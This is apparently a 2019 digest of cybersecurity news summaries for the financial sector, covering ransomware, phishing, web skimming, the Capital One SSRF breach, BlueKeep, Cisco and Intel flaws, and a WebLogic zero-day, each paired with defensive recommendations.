FFIEC Encourages Standardized Approach to Assessing Cybersecurity Preparedness

On Wednesday, August 28, the FFIEC released a press statement that encourages the use of a "standardized approach to assess and improve cybersecurity preparedness." Firms that have adopted a standardized approach have a better ability to track their progress and share their best practices with other institutions and regulators. The FFIEC welcomes collaborative approaches as it will help to advance and enhance the effectiveness of the supervisory process. As stated in the press release, some tools that can be used for standardization include the "FFIEC Cybersecurity Assessment Tool, the National Institute of Standards and Technology Cybersecurity Framework, the Financial Services Sector Coordinating Council Cybersecurity Profile, and the Center for Internet Security Critical Security Controls."

Relevant URL(s): https://www.ffiec.gov/press/pr082819.htm

Ransomware Attack Cripples at Least 20 Local Texas Agencies, State Government Says

The Texas Department of Information Resources announced that a coordinated ransomware attack in Texas took down 20 local government entities. Specifics were not disclosed as to which agencies or jurisdictions were affected, nor was information regarding the amount of the ransom. Ransomware attacks on cities have grown over the last couple of years, and Texas is definitely not the first to experience a ransomware attack. Regarding ransomware attacks in general, the FBI estimates that "more than 4,000 ransomware attacks have taken place every day since January 1, 2016, marking a 300-percent increase over the roughly 1,000 estimated daily attacks in 2015." Organizations are urged to ensure that response measures are documented and that employees are trained on how to react in the event of a ransomware compromise.

Relevant URL(s): https://www.foxnews.com/tech/ransomware-attack-texas-government-agencies

Financial Phishing Grows in Volume and Sophistication in First Half of 2019

Criminals are getting better and more active when it comes to phishing, especially with the use of phishing that claims to be a website from a financial institution. Criminals are now also using certificate authorities (CAs), that give their illegitimate website the green padlock that once gave users a sense of safety. Bob Maley, Chief Security Officer at Normshield said, "free CAs like LetsEncrypt has helped small organizations but with significant unintended consequences. The shift to using domains with certificates changes the game." It is recommended that users search for URLs that are likely to be used by a legitimate business for transactions and to be vigilant when visiting websites.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/financial-phishing-grows-in-volume-and-sophistication-in-first-half-of-2019/d/d-id/1335528

Online Skimming: An Emerging Threat that Requires Urgent Awareness and Attention

Web-based skimming is a growing threat of which all online service providers should be aware. Through the use of sniffers and JavaScript sniffers, attackers infect a website with malicious code that is able to "skim" payment card information without the merchant or consumer knowing. These attacks are not only very effective but also very difficult to identify when a compromise does happen. Attackers use various methods to gain access and inject malicious code and diversify their victims by targeting both e-commerce directly and a third-party software library that merchants use. It is highly recommended that merchants do regular vulnerability assessments of their web applications, both internally and externally, as well as use file-integrity monitoring.

Relevant URL(s): https://www.helpnetsecurity.com/2019/08/06/online-skimming/

What We Can Learn From the Capital One Hack

The Capital One hack has been viewed by many as a zero-day insider attack but the investigation has revealed information that showed the methodology used by the attacker is something that is very well known about, Server Side Request Forgery (SSRF). Due to a misconfigured Web Application Firewall (WAF) that Capital One used for its hosted services with Amazon Web Services (AWS); the attacker was able to trick the firewall and cause it to relay data that included credentials. The credentials that can be sent by the firewall are limited by their permissions. In the case of Capital One, the permissions were enough to allow the attacker to read the contents of files that should not have been accessed. Evan Johnson, manager of the product team at Cloudfare wrote, "SSRF has become the most serious vulnerability facing organizations that use public clouds." He also stated that "The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it. The problem is common and well-known, but hard to prevent and does not have any mitigations built into the AWS platform."

Relevant URL(s): https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

US Company Selling Weaponized BlueKeep Exploit

On May 14, 2019, Microsoft released patches for BlueKeep, and described it as a “wormable vulnerability that could self-propagate similarly to how the EternalBlue helped propagate the WannaCry ransomware outbreak.” On Tuesday, July 23, it was announced that Immunity, Inc., was including a working BlueKeep exploit in CANVAS V7.23, the company’s pen-testing toolkit. Microsoft, the US National Security Agency (NSA), Germany’s BSI cybersecurity agency, the Australian Cybersecurity Centre, the US Department of Homeland Security, and the UK’s National Cybersecurity Centre have all issued warnings and alerts that urged users to patch the vulnerability on older versions of Windows. If users have not patched their systems, it is highly encouraged that patches are applied as soon as possible.

Relevant URL(s): https://www.zdnet.com/article/us-company-selling-weaponized-bluekeep-exploit/

Attackers Abuse XSS Vulnerability in WordPress Plugin to Display Malverts

The WordPress ‘Coming Soon Page and Maintenance Mode’ plugin, version 1.7.8 or below, has an XSS vulnerability that enables attackers to inject HTML or JavaScript code. The code is injected into the blog front-end and causes the site to redirect users by way of pop-up ads. Researchers that discovered the flaw said, “The eventual destination sites vary in scope and intent. Some redirects land users on typical illegitimate ads for pharmaceuticals and pornography, while others attempt to direct malicious activity against the user’s browser.” Version 1.7.9 has patched the flaw, and WordPress users are urged to update immediately.

Relevant URL(s): https://cyware.com/news/attackers-abuse-xss-vulnerability-in-wordpress-plugin-to-display-malverts-1a533b02

QuickBooks Cloud Hosting Firm iNSYQ Hit

On July 16, 2019, iNSYNQ networks were taken offline due to a ransomware attack which left customers of the cloud hosting provider unable to access accounting data. “The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible,” the company said. “As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment.” With ransomware attacks on the rise, organizations are urged to verify and test preventative and detective controls. It is also important to remember to have a robust response plan in the event of an incident.

Relevant URL(s): https://krebsonsecurity.com/2019/07/quickbooks-cloud-hosting-firm-insynq-hit-in-ransomware-attack/

8 Legit Tools and Utilities That Cybercriminals Commonly Misuse

Cybercriminals have long been known for using legitimate tools and utilities for malicious activities. Recently, though, it has been observed by Positive Technologies that there has been a substantial increase in the use of “living-off-the-land” tactics. Why? Attackers that use legitimate tools are able to hide their activities in legitimate traffic. “Threat actors increasingly leverage dual-use tools or tools that are already preinstalled on targeted systems to carry out cyberattacks,” said Fortinet. The eight tools that are most commonly abused are: Cobalt Strike and Metasploit Pro, PowerShell, Windows Sysinternals, VNC, Windows Management Instrumentation (WMI), Mimikatz, TeamViewer, Trusted System Executables.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/8-legit-tools-and-utilities-that-cybercriminals-commonly-misuse/d/d-id/1335254

Open Source Hacking Tool Grows Up

A hacking tool, Koadic, that nation-state hacking teams from Iran, Russia, and China have used to avoid detection was recently updated and has new features that enable attacks to more efficiently spread and persist. The software was released a couple of years ago at DEFCON by the creator, Sean Dillon. Koadic has since received the aforementioned updates that allow it to extract intelligence and information about its targets environment, spread throughout a network, and scrape credentials. “It’s much more efficient now. It can be used to compromise entire networks in a matter of minutes,” said Dillon. The new updates were shown off at Black Hat USA Arsenal in Las Vegas. Due to the capabilities of Koadic, organizations are encouraged to ensure behavior detection methods are enabled.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/open-source-hacking-tool-grows-up/d/d-id/1335296

Customers of 3 MSPs Hit in Ransomware Attacks

Ransomware recently hit three managed services providers (MSP) after access was obtained to tools that remotely monitor and manage client systems. The two tools that were used for remote management and ransomware deployment were Webroot and Kaseya. The vendors disclosed that stolen credentials were likely used to access their tools at the MSP locations. What isn't clear, is how the attackers achieved their access to the Webroot console. Kyle Hanslovan with Huntress Labs said, 'We've yet to see anything that would suggest the issue is a global Webroot vulnerability.' John Durant, CTO at Kaseya said, 'We continue to urge customers to employ best practices around securing their credentials, regularly rotating passwords, and strengthening their security hygiene.'

Relevant URL(s): https://www.darkreading.com/attacks-breaches/customers-of-3-msps-hit-in-ransomware-attacks/d/d-id/1335025

Vulnerability in SymCrypt Could Allow an Attacker to Perform DoS on any Windows Server

Tavis Ormandy, a researcher at Google, found a vulnerability with Microsoft's 'SymCrypt' that attackers could leverage to perform Denial of Service (DoS). He tested the vulnerability with an X.509 digital certificate that was specially crafted to prevent the completion of the verification process. 'The vulnerability could cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric,' Tavis said. There is currently no patch for the vulnerability, but Microsoft has released that the patch will be ready for the July security updates.

Relevant URL(s): https://cyware.com/news/vulnerability-in-symcrypt-could-allow-an-attacker-to-perform-dos-on-any-windows-server-478abe66

Instant Fraud: Consumers See Funds Disappear in Zelle Account Scam

Zelle, a popular digital payment service that is embedded in many banking apps is being leveraged by attackers to access funds in personal checking and savings accounts. All it takes for an attacker to gain unauthorized access to a victims account is a spoofed call from the attacker that appears to come from the individual's bank. The victim is social engineered to share the Zelle authorization code with the attacker which then authorizes the attacker's log-in attempt. What makes Zelle so appealing to attackers is the direct access a victims bank account due to it being embedded within banking apps with automatic connection to a user account.

Relevant URL(s): https://www.nbcnews.com/business/consumer/instant-fraud-consumers-see-funds-disappear-zelle-account-scam-n1015736

Criminals Sell Hacker Toolkits for BofA on Dark Web

Michael McGuire, a criminology professor at the University of Surrey, posed a buyer on the dark web and discovered organized crime groups that were selling unauthorized network access to financial organizations. The crime group was selling fraudulent web pages, specific to Bank of America, that allow the buyer to phish customers and harvest their data. The toolkit and tutorial were selling for $11. Other companies being targeted include AT&T and Verizon. McGuire said, "if they were not already doing so, corporate cybersecurity teams ought to spend time monitoring the dark web to pick up signs of potential threats, such as data from their organizations already for sale or rogue employees willing to sell network access to others."

Relevant URL(s): https://www.americanbanker.com/articles/criminals-sell-hacker-toolkits-for-bofa-on-dark-web-study-finds?tag=00000154-4da2-d45e-a175-6fbf03b40000

Financial Sector Under Siege

Cybersecurity crime in the financial sector is as prominent as it has ever been and continues to grow.  Financial institutions are up against cyber-criminals that vary in size and complexity from individuals to nation-states.  The methods that these attackers use are increasingly damaging to organizations and are being executed against targets with impeccable timing.  Attackers will wait for an organization to launch a new program or service that has not been thoroughly vetted for security and leverage that to gain a position within the victim's environment.  As new technologies emerge and banking continues to move into the digital era, it is recommended that institutions always include security at the forefront of initiatives to ensure that all assets under their control are secure.

Relevant URL(s): https://www.darkreading.com/cloud/financial-sector-under-siege/a/d-id/1334725

'GozNym' Banking Malware Gang Dismantled by International Law Enforcement

Law enforcement agencies across six countries have successfully arrested a group of individuals that were responsible for the GozNym Banking malware.  The six countries that worked together to bring the group down were Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States.  The GozNym malware, a combination of Gozi ISFB and Nymaim, was used to steal over $100 Million from more than 41,000 victims, predominately in the United States and Europe.  Earlier this month, the U.S. Court released that the defendants are being charged with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering.

Relevant URL(s): https://thehackernews.com/2019/05/GozNym-banking-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18do

Flaw Affecting Millions of Cisco Devices Let Attackers Implant Persistent Backdoor

Thrangrycat, a new vulnerability has been unveiled for Cisco routers, switches, and firewalls that attackers can leverage to install a persistent backdoor.  Thrangrycat has been identified as CVE-2019-1649 and was discovered by researchers at Red Balloon.  The vulnerability exists on Cisco products that support the Trust Anchor module (TAm) that is implemented on Cisco enterprise devices.  The TAm is used to verify that the firmware operating on the hardware platforms is authentic and unmodified. "By chaining Thrangrycat and remote command injection vulnerabilities, an attacker can remotely and persistently bypass Cisco's secure boot mechanism and lock out all future software updates to the TAm," researchers said.  Further details regarding the vulnerability are expected to be released at Black Hat USA this August.

Relevant URL(s): https://thehackernews.com/2019/05/cisco-secure-boot-bypass.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1986.nk0ao093p4.18av

New Class of CPU Flaws Affect Almost Every Intel Processor Since 2011

Earlier this month, researchers released information about a vulnerability in all modern Intel chips to include the chips used by Apple.  The new flaw is a speculative execution side-channel vulnerability that could allow an attacker the ability to steal system and user-level secrets from the CPU buffer.  If properly executed, disk encryption keys and user passwords could be at risk due to the vulnerability.  It is executed through the use of Microarchitectural Data Sampling(MDS), which is a combination of four different flaws.  Microcode Updates (MCU) have been released by Intel to fix the MDS vulnerabilities, and users are urged to implement the patches as soon as possible.

Relevant URL(s): https://thehackernews.com/2019/05/intel-processor-vulnerabilities.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&_m=3n.009a.1989.nk0ao093p4.18e0

Open Banking Establishes New Access to Banks’ Networks, Creating Additional Security Issues

Financial organizations are having to find a balance between security and usability as they work to maintain and strengthen the trust of consumers.  Open banking has created a shift where organizations now have an ecosystem of partners that they also need to ensure are secure.  “Security is only as good as the weakest link in the network of ecosystem partners, and the global trend toward open banking is increasing the spiderweb of interconnectivity among banks and third parties — creating additional points of weakness and vulnerability in banks’ network security,” said Alan McIntyre, global head of Accenture’s Banking practice.  As open banking continues to grow and evolve, financial organizations are urged to always verify the security of a potential partner before allowing them access to organizational data. 

Relevant URL(s): https://www.helpnetsecurity.com/2019/05/08/open-banking-security-issues/

Researchers Flag New Oracle WebLogic Zero-Day RCE Flaw

All versions of Oracle Weblogic are vulnerable to a remote code execution flaw.  There is currently no CVE number attached to the flaw, but Oracle has been alerted, and it is being tracked by the following identifier: CNVD-C-2019-48814.  There are tens of thousands of Weblogic servers across the world with the majority being in the US and China.  These servers can be attractive to attackers because they allow them access to resources that they can use for covert crypto-mining.  Server administrators are urged to delete wls9_async_response.war, wls-wsat.war and restart the Weblogic service.  Another option is to prevent access to the /_async/* and /wls-wsat/* URL paths with access policy control. 

Relevant URL(s): https://www.helpnetsecurity.com/2019/04/25/oracle-weblogic-zero-day-rce/